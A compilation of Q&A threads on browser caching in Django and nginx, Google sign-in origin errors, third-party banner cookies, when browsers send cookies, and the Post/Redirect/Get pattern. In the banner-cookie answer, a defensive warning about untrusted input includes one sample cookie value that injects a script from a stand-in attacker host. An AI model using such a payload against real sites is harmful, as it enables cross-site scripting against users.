Cache website to browser when navigating back - django

I have a single url/page of my website that I want to be cached to browser, so whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser. Also, I can't use solutions that cache the page in between the web server and Django, as every user has different permissions on what data they can see.
So I added this in my nginx config:
...
location /search {
expires 300s;
add_header Cache-Control "private";
...
And this works very well, 50% of the time :). How can I make it work always?

whenever a user navigates away from that page, and then presses the BACK button of the browser, I don't want that request to go to django at all, but serve the cached version of the page that is in the browser
For some browsers, this is the default behavior - if you have set no caching directives on the server, then it will keep not only a copy of the response but the entire rendered page in memory so than when you click the back button, it can be shown instantly.
But if you want to explicitly instruct the browser to cache the response you can use a max-age directive on the Cache-Control header. Set
Cache-Control: max-age=3600
This is a more modern and reliable way than using an "Expires" header, especially for small durations. If the user's browser has the incorrect time or time zone set "Expires" might not work at all, but "max-age" still should.
If you are serving each person a different version of the page you can add the "private" too to prevent caching by proxies (as in your example):
Cache-Control: private; max-age=3600
Note: you can't force a browser to always use the cache. If you are noticing that sometimes it doesn't use the cache, it could be:
The item in the cache has expired. You were giving it only 5 minutes, so 5 minutes after the request that went into the cache, if you request it again it will send through the request to the remote server - even if there have been requests in the time between.
The browser cache became full and some items were purged.
For some reason the browser believed or was configured to believe that the response should not be cached regardless of cache directives.
The user pressed reload.
A proxy between client and server stripped the Cache-Control or other headers.

Related

Origin is "not allowed" for given client ID when origin was added

Note: My site is in production mode, not testing. It is pending verification due to me adding an icon. This issue persisted before the verification was started.
Whenever my browser makes a request to Google for the one-tap widget or the pill, both requests return 400 Bad Request with an empty HTML page and the console is sent a message stating "The given origin is not allowed for the given client ID." I've gone onto the Google Cloud Console and checked my origins. I have only one listed, and it's the exact site I'm sending requests from my browser. My site also has its traffic proxied through Cloudflare if that makes a difference. In addition, I am using JavaScript callbacks (which work when used in PI#1).
Potential issue #1: The URLs are typed in wrong
When I insert localhost (I add https and http because I test with a HTTPS webserver locally using a Cloudflare origin certificate), the requests go through perfectly. However, the moment the requests are from my browser when it's not localhost, the requests fail. I've copied and pasted straight from the URL bar just to make sure that there's no typos or anything but the same results return.
Potential issue #2: The widget is making bad requests
I do open the URLs in other tabs (Which yield the same results from PI#1) and insert bogus URLs like example.com and thisisnotaurl.com to ensure it's not just dropping every request. Those requests return 403 Forbidden instead of 400 Bad Request.
Potential issue #3: The issue is browser specific
I've checked this issue on both Firefox and Microsoft Edge, both on the stable branches and completely up to date. I've disabled my ad block (UBlock Origin & Firefox built-in protection) to ensure they aren't messing with requests but everything except the crucial requests fail with 400 Bad Request. I have yet to test other browsers as I do not have them installed but I assume the same results come from them.
An example of the code can be found here: https://gist.github.com/Coder-Tavi/772ea25b16f3fa0b6b0e04739a1689dd.
The origins shown below are the exact website I am accessing. In addition, I've verified the client IDs are exactly the same as the ones I have added
Referrer Policy is improperly configured
The HTTP header Referrer-Policy controls the exact amount of data sent to servers regarding the origin of the request. In most cases, this is set to same-origin which means that the Referer header will send the origin to servers with the same origin.
Consider you have a webserver at example.com and another at web.example.com with a Referrer-Policy of same-origin. When example.com sends a request to web.example.com, the Referer header will contain the origin of the request, since it is the same origin. However, if example.com sends a request to google.com, the Referer header will not send any origin data, as google.com and example.com are not the same origin.
If we look at the requests, this directive is what we see
As such, we need to update the directive to allow the browser to send the origin in the Referer header. This can be done by inserting the following into the HTML of the current page.
<meta name="referrer" content="origin">
This meta tag will allow the browser to send the origin only to other webservers, and as such, Google will see the origin.
Consider the example above again. This time, when example.com sends a request to google.com, the request will contain a Referer header with the origin, as the directive allows for sharing of the origin. However, with this current policy, only the origin is sent, not the query parameters and other parts of the URL. With the following URL: https://example.com/test/123, google.com will only see https://example.com. The MDN Web Docs contain all the possible values and their effects.

Can I set a cookie in this situation?

I want to post a banner ad on a.com, for this to happen, a.com has to query b.com for the banner url via jsonp. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purpose.
I have no control of a.com, so I cannot write any client side JS or ask them to include any external js files. I can only expose a query url on b.com for a.com's programmer to query
I have total control of b.com and c.com
When a.com receives the banner url via JSONP, it will insert the banner dynamically into its DOM for displaying purpose
A small follow up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevents c.com to set any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these
cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some
firewalls. These can be restrictions in per-cookie length, length
of sum of cookies per domain, or just number of cookies. I've
encountered a firewall that allowed a certain number of bytes in
Cookie: request headers and dropped all Cookie: headers beyond
that size. Some older mobile devices have very small limits on cookie
size.
Cookies are editable by the user and can be tampered with by
men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against
replay attacks unless you
include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.

Django Upstream Caching (Vary On Headers) Not working

I have a view which displays user specific, meaning the content of the response for the same URL is unique per individual authenticated user.
Ideally, these pages would be cached in the browser. However, that does not appear to be the case in Chrome or Firefox (on production or locally).
The development server is processing the view each time, despite the fact that I've set the #vary_on_cookies decorator.
I have the right middleware in place (in the right order):
django.middleware.cache.UpdateCacheMiddleware
django.middleware.cache.FetchFromCacheMiddleware
Do I need to set CACHE_MIDDLEWARE_ANONYMOUS_ONLY = False?
One thing that I've noticed is that the request is sending this cache control header:
Cache-Control:max-age=0
I assume that that might be the root problem. Or is this related to the development server?
Any suggestions?

Does every web request send the browser cookies?

Does every web request send the browser's cookies?
I'm not talking page views, but a request for an image, .js file, etc.
Update
If a web page has 50 elements, that is 50 requests. Why would it send the SAME cookie(s) for each request, doesn't it cache or know it already has it?
Yes, as long as the URL requested is within the same domain and path defined in the cookie (and all of the other restrictions -- secure, httponly, not expired, etc) hold, then the cookie will be sent for every request.
As others have said, if the cookie's host, path, etc. restrictions are met, it'll be sent, 50 times.
But you also asked why: because cookies are an HTTP feature, and HTTP is stateless. HTTP is designed to work without the server storing any state between requests.
In fact, the server doesn't have a solid way of recognizing which user is sending a given request; there could be a thousand users behind a single web proxy (and thus IP address). If the cookies were not sent every request, the server would have no way to know which user is requesting whatever resource.
Finally, the browser has no clue if the server needs the cookies or not, it just knows the server instructed it to send the cookie for any request to foo.com, so it does so. Sometimes images need them (e.g., dynamically-generated per-user), sometimes not, but the browser can't tell.
Yes. Every request sends the cookies that belong to the same domain. They're not cached as HTTP is stateless, what means every request must be enough for the server to figure out what to do with it. Say you have images that are only accessible by certain users; you must send your auth cookie with every one of those 50 requests, so the server knows it's you and not someone else, or a guest, among the pool of requests it's getting.
Having said that, cookies might not be sent given other restrictions mentioned in the other responses, such as HTTPS setting, path or domain. Especially there, an important thing to notice: cookies are not shared between domains. That helps with reducing the size of HTTP calls for static files, such as the images and scripts you mentioned.
Example: you have 4 cookies at www.stackoverflow.com; if you make a request to www.stackoverflow.com/images/logo.png, all those 4 cookies will be sent.
However, if you request stackoverflow.com/images/logo.png (notice the subdomain change) or images.stackoverflow.com/logo.png, those 4 cookies won't be present - but maybe those related to these domains will.
You can read more about cookies and images requesting, for example, at this StackOverflow Blog Post.
No. Not every request sends the cookies. It depends on the cookie configuration and client-server connection.
For example, if your cookie's secure option is set to true then it must be transmitted over a secure HTTPS connection. Means when you see that website with HTTP protocol then these cookies won't be sent by browsers as the secure flag is true.
3 years have passed
There's another reason why a browser wouldn't send cookies. You can add a crossOrigin attribute to your <script> tag, and the value to "anonymous". This will prevent cookies to be sent to the destination server. 99.9% of the time, your javascripts are static files, and you don't generate that js code based on the request's cookies. If you have 1KB of cookies, and you have 200 resources on your page, then your user is uploading 200KB, and that might take some time on 3G and have zero effect on the result page. Visit HTML attribute: crossorigin for reference.
Cookie has a "path" property. If "path=/" , the answer is Yes.
I know this is an old thread. But I've just noticed that most browsers won't sent cookies for a domain if you add a trailing dot. For example http://example.com. won't receive cookies set for .example.com. Apache on the other hand treats them as the same host. I find this useful to make cross domain tracking more difficult for external resources I include, but you could also use it for performance reasons. Note this brakes validation of https certificates. I've run a few tests using browsershots and my own devices. The hack works on almost all browsers except for safari (mobile and desktop), which will include cookies in the request.
Short answer is Yes. The below lines are from the JS documentation
Cookies were once used for general client-side storage. While this was legitimate when they were the only way to store data on the client, it is now recommended to use modern storage APIs. Cookies are sent with every request, so they can worsen performance (especially for mobile data connections).

Setting up cache with Django to work around the "page has expired" IE problem

I have got a familiar problem. I am using Django-0.97, and cannot upgrade -- though the version of Django being used should not play any part in the cause of the problem.
I have a search view that presents a form to the user, and, on submission of the form via POST, performs heavy computations and displays a list of items that are generated as a result of those computations. Users may click on the "more info" link of any of those items to view the item detail page.
Users on IE, once they are on the item detail page for any item from the search results page, get the familiar "webpage has expired, click on refresh button, yadda yadda yadda" error when they hit the "back" button on the browser. Sadly, a good majority of the users of the site use IE, are not tech savvy, and are complaining about this problem.
Thinking that setting up a cache backend may solve the problem, I configured a simple cache backend. I juggled with per-site cache and per-view cache, but to no avail. And now, I am not too sure I have set up the cache stuff properly.
Any hints, suggestions that may help in mitigating the problem will be hugely appreciated.
Thanks.
UPDATE (20 July 2009)
I have used Fiddler to inspect the HTTP headers of both the request and response. IE is sending the Pragma: no-cache header in the POST request. The HTTP response generated as a result of the request has the following headers:
Cache-Control: public, max-age=3600
Date: someDateHere
Vary: Cookie
And, yes, I am not using the PRG pattern.
You may find you need to use the PRG pattern (Post/Redirect/Get). With this pattern, the handler for the POST will:
perform the heavy computations, determine the search results, and store them in the user's session (or store them in the db keyed by the user's session).
Send a response with a redirect header to an idempotent page, which is then fetched by the browser using a GET, when it follows the redirection.
When the redirected-to page is accessed, the server displays the search results page, computed from the stored data in the session, and at a different URL from the URL that was POSTed to. You should be able to use normal caching headers for this (search results) page, depending on how volatile your search results will be.
Under RFC2616, "POST" is not an idempotent method, which means that the browser will not resend the request unless the user confirms that resend. So, to prevent the prompt, you must ensure that the CLIENT caches the page.
To do so, use the Cache Control header: http://www.fiddler2.com/redir/?id=httpperf and ensure that you are not sending back any Vary or Pragma: no-cache headers: http://blogs.msdn.com/ieinternals/archive/2009/06/17/9769915.aspx
It would be helpful for you to capture your HTTP POST's response headers (e.g. with Fiddler) and update your question with them.